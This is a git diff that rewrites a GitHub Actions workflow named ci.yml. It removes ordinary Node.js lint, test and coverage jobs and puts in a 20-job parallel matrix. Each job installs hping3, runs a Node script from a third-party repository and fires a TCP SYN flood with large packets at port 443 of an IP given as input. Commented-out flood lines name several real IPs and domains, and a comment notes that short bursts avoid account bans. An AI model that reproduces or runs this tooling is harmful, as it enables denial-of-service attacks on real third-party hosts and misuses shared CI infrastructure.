Update ci.yml

diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1,107 +1,120 @@
-name: ci
-
 on:
   workflow_dispatch:
+    inputs:
+      ip:
+        required: true
+        default: '0.0.0.0'
+        type: string
 
-permissions:
-  contents: read
-
-# Cancel in progress workflows
-# in the scenario where we already had a run going for that PR/branch/tag but then triggered a new run
 concurrency:
-  group: "${{ github.workflow }} ✨ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}"
+  group: ${{ github.workflow }}-${{ github.ref }}
   cancel-in-progress: true
 
+env:
+  TZ: Asia/Shanghai
+  TASK_COUNT: 1160
+  # node index.js --count 1160
+
 jobs:
-  lint:
-    name: Lint
+  prepare-matrix:
     runs-on: ubuntu-latest
+    outputs:
+      ids: ${{ steps.set-matrix.outputs.ids }}
     steps:
-      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
-        with:
-          persist-credentials: false
-      - name: Setup Node.js
-        uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
-        with:
-          node-version: 'lts/*'
+      - id: set-matrix
+        run: |
+          count=20
+          ids=$(jq -c -n --argjson n "$count" '[range(1; $n+1)]')
+          echo "ids=$ids" >> $GITHUB_OUTPUT
 
-      - name: Install dependencies
-        run: npm install --ignore-scripts --include=dev
-
-      - name: Run lint
-        run: npm run lint
-
-  test:
+  concurrent-jobs:
+    needs: prepare-matrix
+    runs-on: ubuntu-latest
+    continue-on-error: true
     strategy:
+      max-parallel: 20
       fail-fast: false
       matrix:
-        os: [ubuntu-latest, windows-latest]
-        node-version: [18, 19, 20, 21, 22, 23, 24]
-        # Node.js release schedule: https://nodejs.org/en/about/releases/
+        job_id: ${{ fromJson(needs.prepare-matrix.outputs.ids) }}
 
-    name: Node.js ${{ matrix.node-version }} - ${{matrix.os}}
-
-    runs-on: ${{ matrix.os }}
     steps:
-      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
-        with:
-          persist-credentials: false
+      - name: 记录开始时间
+        id: start
+        run: echo "start_time=$(date +%s)" >> $GITHUB_OUTPUT
 
-      - name: Setup Node.js ${{ matrix.node-version }}
-        uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
+      - name: 检查首个job完成时间
+        id: check_time
+        uses: actions/cache/restore@v4
         with:
-          node-version: ${{ matrix.node-version }}
+          path: matrix_first_finished_time.txt
+          key: matrix-first-finished-${{ github.run_id }}
 
-      - name: Configure npm loglevel
+      - name: 判断是否需要退出
+        if: steps.check_time.outputs.cache-hit == 'true'
         run: |
-          npm config set loglevel error
-        shell: bash
+          first_done=$(cat matrix_first_finished_time.txt)
+          my_start=${{ steps.start.outputs.start_time }}
+          echo "First: $first_done, Mine: $my_start"
+          if [ "$my_start" -gt "$first_done" ]; then
+            echo "::error::当前job启动时间晚于首个job完成时间"
+            exit 1
+          fi
 
-      - name: Install dependencies
-        run: npm install
+      - uses: actions/checkout@v4
+        with:
+          repository: mirllan2025/express
 
-      - name: Output Node and NPM versions
+      - name: Step 1
         run: |
-          echo "Node.js version: $(node -v)"
-          echo "NPM version: $(npm -v)"
+          sudo apt install hping3 -q
+          yarn
+          timeout 600s node index.js --count ${{env.TASK_COUNT}}
 
-      - name: Run tests
-        shell: bash
-        run: npm run test-ci
+      - name: Step 2
+        run: |
+          # sudo timeout 5s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 137.220.188.11 || true
+          # sudo timeout 5s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 137.220.188.12 || true
 
-      - name: Upload code coverage
-        uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
+          # sudo timeout 5s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 182.16.89.10 || true
+          # sudo timeout 5s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 182.16.89.11 || true
+          # sudo timeout 10s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 180.178.38.85 || true
+          
+          # sudo timeout 5s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 154.198.240.70 || true
+
+          # Alibaba
+          # IP="80ym.com" # 8.210.147.180
+          IP=${{inputs.ip}}
+          # IP="154.89.50.218" # www.enk7h.vip
+          # IP="ngk86.vip"
+          TIMEOUT=3
+          # 3秒不会封号
+
+          # Cloudflare
+          # IP="www.gname.com"
+          # TIMEOUT=0
+
+          # 如果不是IPv4地址，则认为是域名，去解析
+          if [[ ! $IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
+              IP=$(dig +short "$IP" | grep -E '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$' | head -n 1)
+          fi
+
+          sudo timeout $TIMEOUT hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 $IP || true
+
+      - name: 再次检查首个job完成时间
+        if: always()
+        id: double_check
+        uses: actions/cache/restore@v4
         with:
-          name: coverage-node-${{ matrix.node-version }}-${{ matrix.os }}
-          path: ./coverage/lcov.info
-          retention-days: 1
+          path: matrix_first_finished_time.txt
+          key: matrix-first-finished-${{ github.run_id }}
 
-  coverage:
-    needs: test
-    runs-on: ubuntu-latest
-    permissions:
-      contents: read
-      checks: write
-    steps:
-      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
+      - name: 保存首个job完成时间
+        if: always() && steps.double_check.outputs.cache-hit != 'true'
+        run: date +%s > matrix_first_finished_time.txt
+
+      - name: 缓存首个job完成时间
+        if: always() && steps.double_check.outputs.cache-hit != 'true'
+        uses: actions/cache/save@v4
         with:
-          persist-credentials: false
-
-      - name: Install lcov
-        shell: bash
-        run: sudo apt-get -y install lcov
-
-      - name: Collect coverage reports
-        uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4.3.0
-        with:
-          path: ./coverage
-          pattern: coverage-node-*
-
-      - name: Merge coverage reports
-        shell: bash
-        run: find ./coverage -name lcov.info -exec printf '-a %q\n' {} \; | xargs lcov -o ./lcov.info
-
-      - name: Upload coverage report
-        uses: coverallsapp/github-action@648a8eb78e6d50909eff900e4ec85cab4524a45b # v2.3.6
-        with:
-          file: ./lcov.info
+          path: matrix_first_finished_time.txt
+          key: matrix-first-finished-${{ github.run_id }}
